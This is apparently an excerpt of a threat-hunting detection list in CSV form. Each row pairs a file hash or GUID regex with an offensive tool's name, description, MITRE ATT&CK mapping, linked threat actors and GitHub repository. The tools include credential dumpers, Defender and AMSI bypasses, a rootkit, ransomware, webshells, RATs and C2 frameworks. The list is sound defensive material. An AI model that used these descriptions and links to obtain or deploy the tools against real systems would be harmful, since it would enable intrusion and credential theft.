"*4d29f1251e4ef23a8e22ed209d547e84c421fa736b87646ddd8269c3a0e84093*",".{0,1000}4d29f1251e4ef23a8e22ed209d547e84c421fa736b87646ddd8269c3a0e84093.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","0","#filehash #linux","N/A","10","10","3940","644","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z","26276"
"*4d2d4f8ebeeecca1e823c2f63975a959da91840f681df53243c6caa16ed67621*",".{0,1000}4d2d4f8ebeeecca1e823c2f63975a959da91840f681df53243c6caa16ed67621.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","26277"
"*4d2f66539f067f631db31039ec81707028bb37efcd2ebbf86a1a920d60d75263*",".{0,1000}4d2f66539f067f631db31039ec81707028bb37efcd2ebbf86a1a920d60d75263.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","#filehash","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","26278"
"*4d31e1fd50918c09718d0657fb2c158a647b38ae833a231f52c717077d34d3cb*",".{0,1000}4d31e1fd50918c09718d0657fb2c158a647b38ae833a231f52c717077d34d3cb.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","26280"
"*4d352942cc659ab92345eeb0a8b9d6c974b5123c2f05db2488a27028b3c8f746*",".{0,1000}4d352942cc659ab92345eeb0a8b9d6c974b5123c2f05db2488a27028b3c8f746.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26282"
"*4d3bae5b-eb71-413b-adb2-a58f1fa2ad64*",".{0,1000}4d3bae5b\-eb71\-413b\-adb2\-a58f1fa2ad64.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for x64 Windows 7 - 11","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","1","0","#GUIDproject","N/A","9","9","802","156","2022-07-27T15:48:45Z","2022-07-14T02:37:50Z","26283"
"*4d4e0c87fefa1a01b8a55af43a2b13c41457e320292d537e4f3f9b160de0e80f*",".{0,1000}4d4e0c87fefa1a01b8a55af43a2b13c41457e320292d537e4f3f9b160de0e80f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26286"
"*4d50500e4170dc1fd2dd377467ad2722fa0db20a0d90407d15e6856175f26fca*",".{0,1000}4d50500e4170dc1fd2dd377467ad2722fa0db20a0d90407d15e6856175f26fca.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26287"
"*4d50951bb2357ec9dfc9e97c4fb8729c7a1d94b5d113683912469a7a05859992*",".{0,1000}4d50951bb2357ec9dfc9e97c4fb8729c7a1d94b5d113683912469a7a05859992.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26288"
"*4d5350c8-7f8c-47cf-8cde-c752018af17e*",".{0,1000}4d5350c8\-7f8c\-47cf\-8cde\-c752018af17e.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","#GUIDproject","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","26289"
"*4d5886e86e0a2c97e72a648d63ba392c9ac14c8a973b454c11ecd223e2ccc9cc*",".{0,1000}4d5886e86e0a2c97e72a648d63ba392c9ac14c8a973b454c11ecd223e2ccc9cc.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","26290"
"*4d5ee19778d34bdddd4c391ed860d10d2d3a46c22090fa0e701e263bec6bca2c*",".{0,1000}4d5ee19778d34bdddd4c391ed860d10d2d3a46c22090fa0e701e263bec6bca2c.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","0","#filehash","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","26291"
"*4d6434d5a809c797570c59fd91eecd4f86b85e46cc6a43cf186a10a08db5e844*",".{0,1000}4d6434d5a809c797570c59fd91eecd4f86b85e46cc6a43cf186a10a08db5e844.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","26292"
"*4d64e31510b95312900f0a12bffb0f9130363da3dcb90cf4e7717427937fe058*",".{0,1000}4d64e31510b95312900f0a12bffb0f9130363da3dcb90cf4e7717427937fe058.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","26293"
"*4d6d37ca48cd2999f2362975d0ede5f28dec0780d6815db75ff450aef1aabf12*",".{0,1000}4d6d37ca48cd2999f2362975d0ede5f28dec0780d6815db75ff450aef1aabf12.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","26295"
"*4d710fdd6e18bf8ad16847a9e03cf858b20eaeec3e6b8fe9ac1b29eb36883892*",".{0,1000}4d710fdd6e18bf8ad16847a9e03cf858b20eaeec3e6b8fe9ac1b29eb36883892.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","26296"
"*4D71336E-6EF6-4DF1-8457-B94DC3D73FE7*",".{0,1000}4D71336E\-6EF6\-4DF1\-8457\-B94DC3D73FE7.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","26297"
"*4d7424482e96e9326182ad86bbe68a0f7b9da63d7508552649f05a18848d4bad*",".{0,1000}4d7424482e96e9326182ad86bbe68a0f7b9da63d7508552649f05a18848d4bad.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","#filehash","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","26298"
"*4d76a28ba8830185fde42e139a27d7bd8197f33810b06fcfb7980c8ddba589cf*",".{0,1000}4d76a28ba8830185fde42e139a27d7bd8197f33810b06fcfb7980c8ddba589cf.{0,1000}","offensive_tool_keyword","AppProxyC2","simple POC to show how to tunnel traffic through Azure Application Proxy","T1090 - T1572 - T1071","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/xpn/AppProxyC2","1","0","#filehash","N/A","9","10","69","18","2021-04-21T13:02:15Z","2021-04-21T10:46:16Z","26300"
"*4d76e208d1d7d828e35725d30cdb907cef2bd52e2c5cf9ec4290182f4464d2e8*",".{0,1000}4d76e208d1d7d828e35725d30cdb907cef2bd52e2c5cf9ec4290182f4464d2e8.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","26301"
"*4D7AEF0B-5AA6-4AE5-971E-7141AA1FDAFC*",".{0,1000}4D7AEF0B\-5AA6\-4AE5\-971E\-7141AA1FDAFC.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","#GUIDproject","N/A","10","2","155","29","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z","26303"
"*4D7BA537-54EC-4005-9CC2-AE134B4526F9*",".{0,1000}4D7BA537\-54EC\-4005\-9CC2\-AE134B4526F9.{0,1000}","offensive_tool_keyword","GhostMapper","GhostMapper involves modifying Windows system ""dump_"" prefix drivers to exploit crash handling mechanisms for malicious purposes.","T1014 - T1070.004 - T1055.011","TA0003 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Oliver-1-1/GhostMapper","1","0","#GUIDproject","N/A","8","3","279","62","2025-04-12T19:17:46Z","2023-10-31T11:26:33Z","26304"
"*4d8017e676ae345fc21e9037d70cf7c8444c945a61a533dc1926453caf7457d9*",".{0,1000}4d8017e676ae345fc21e9037d70cf7c8444c945a61a533dc1926453caf7457d9.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26306"
"*4d8abac919ee89fdf0e387f98f076db1bae2ec1a9113a87baa2a2afe9cbaf842*",".{0,1000}4d8abac919ee89fdf0e387f98f076db1bae2ec1a9113a87baa2a2afe9cbaf842.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26308"
"*4d906dada24cb2d009d6cde9005711271167fc5bc9c348d9b436056a7ba80f26*",".{0,1000}4d906dada24cb2d009d6cde9005711271167fc5bc9c348d9b436056a7ba80f26.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","26309"
"*4d967d51603e83aae994ae5354416bfb0867b27527da4fd94b40f75c2d3c641e*",".{0,1000}4d967d51603e83aae994ae5354416bfb0867b27527da4fd94b40f75c2d3c641e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26311"
"*4d9b2297358dbe1d72168480ab67ef7b992c2b84d4f09d71d906c941523f7b74*",".{0,1000}4d9b2297358dbe1d72168480ab67ef7b992c2b84d4f09d71d906c941523f7b74.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","0","#filehash","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","26312"
"*4da3a2389627e7ba88645c2b77a46a06ba84738dcd1fe2c0b319be1190b8b082*",".{0,1000}4da3a2389627e7ba88645c2b77a46a06ba84738dcd1fe2c0b319be1190b8b082.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","26314"
"*4da7304d47772ca23c20710b9b2fa51466080b8f2c6cc3168c908bc25cbecd10*",".{0,1000}4da7304d47772ca23c20710b9b2fa51466080b8f2c6cc3168c908bc25cbecd10.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26315"
"*4db3484ba73cd09d06aeee140adcd85fb6c72fb76d05a86ae95fb27e9c795e45*",".{0,1000}4db3484ba73cd09d06aeee140adcd85fb6c72fb76d05a86ae95fb27e9c795e45.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26317"
"*4db9721f4c76b487e34fa87bb6a76632fb37873de18982892268a70b18b8a4a9*",".{0,1000}4db9721f4c76b487e34fa87bb6a76632fb37873de18982892268a70b18b8a4a9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26318"
"*4dbd32931bc77778850c20282a9e3adebd4d23b7ef4b0635380b520c432b48d9*",".{0,1000}4dbd32931bc77778850c20282a9e3adebd4d23b7ef4b0635380b520c432b48d9.{0,1000}","offensive_tool_keyword","SharpLogger","Keylogger written in C#","T1056.001 - T1056.003","TA0005 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/djhohnstein/SharpLogger","1","0","#filehash","N/A","10","2","126","41","2019-12-13T04:40:56Z","2018-12-18T01:45:17Z","26320"
"*4dc4fec23df1e9a1fcd37f4edf731466f14eefa9eded63a3387ee14adf70e104*",".{0,1000}4dc4fec23df1e9a1fcd37f4edf731466f14eefa9eded63a3387ee14adf70e104.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","26321"
"*4dd16113033905dbff69b134008cb848367c4d6899c6d5f9b63164328e576d79*",".{0,1000}4dd16113033905dbff69b134008cb848367c4d6899c6d5f9b63164328e576d79.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","26323"
"*4dd26db699ec39da43ed638597d277ccfe5e27d15dedfb037476d0f4a5b8cb87*",".{0,1000}4dd26db699ec39da43ed638597d277ccfe5e27d15dedfb037476d0f4a5b8cb87.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","26324"
"*4DD3206C-F14A-43A3-8EA8-88676810B8CD*",".{0,1000}4DD3206C\-F14A\-43A3\-8EA8\-88676810B8CD.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","0","#GUIDproject","N/A","10","4","349","45","2024-08-29T12:23:34Z","2023-10-21T17:27:59Z","26325"
"*4ddb624f4a569274b1dbe946a2a7c6c4bd43d36183bdef148814c228147b2fd2*",".{0,1000}4ddb624f4a569274b1dbe946a2a7c6c4bd43d36183bdef148814c228147b2fd2.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","26326"
"*4ddc82b4af931ab55f44d977bde81bfbc4151b5dcdccc03142831a301b5ec3c8*",".{0,1000}4ddc82b4af931ab55f44d977bde81bfbc4151b5dcdccc03142831a301b5ec3c8.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","26327"
"*4de29767842d979fd17a50becf0295588a1578b793c5415032847d684f54e445*",".{0,1000}4de29767842d979fd17a50becf0295588a1578b793c5415032847d684f54e445.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26328"
"*4DE43724-3851-4376-BB6C-EA15CF500C44*",".{0,1000}4DE43724\-3851\-4376\-BB6C\-EA15CF500C44.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","#GUIDproject","N/A","9","2","188","38","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z","26329"
"*4de62887a3d002ead967d9ba1a18f05d5859429477457b6da2ff54f2fa5ae624*",".{0,1000}4de62887a3d002ead967d9ba1a18f05d5859429477457b6da2ff54f2fa5ae624.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26331"
"*4de639c973c8f91cf5e4e9c8078dacbbec2de8443b400c8233f1b5dae48a9444*",".{0,1000}4de639c973c8f91cf5e4e9c8078dacbbec2de8443b400c8233f1b5dae48a9444.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#filehash","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","26332"
"*4de892d30281aac34dd5aeb710d6fffc90e46b7d9df8505205531afe991973f4*",".{0,1000}4de892d30281aac34dd5aeb710d6fffc90e46b7d9df8505205531afe991973f4.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#filehash","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","26334"
"*4debfbce500084f6de01ea2cabbbde5fb6c04c99285dc82047fc53db5a868e5f*",".{0,1000}4debfbce500084f6de01ea2cabbbde5fb6c04c99285dc82047fc53db5a868e5f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","26335"
"*4dec200d795dfe7369061bc3bd38e8bb6ff332360295e2786f4a60003786503e*",".{0,1000}4dec200d795dfe7369061bc3bd38e8bb6ff332360295e2786f4a60003786503e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26336"
"*4e025470453cc0b4c72b384b1441ecbeba1cf3b2ae98837ba630aa5102d1b6d0*",".{0,1000}4e025470453cc0b4c72b384b1441ecbeba1cf3b2ae98837ba630aa5102d1b6d0.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26339"
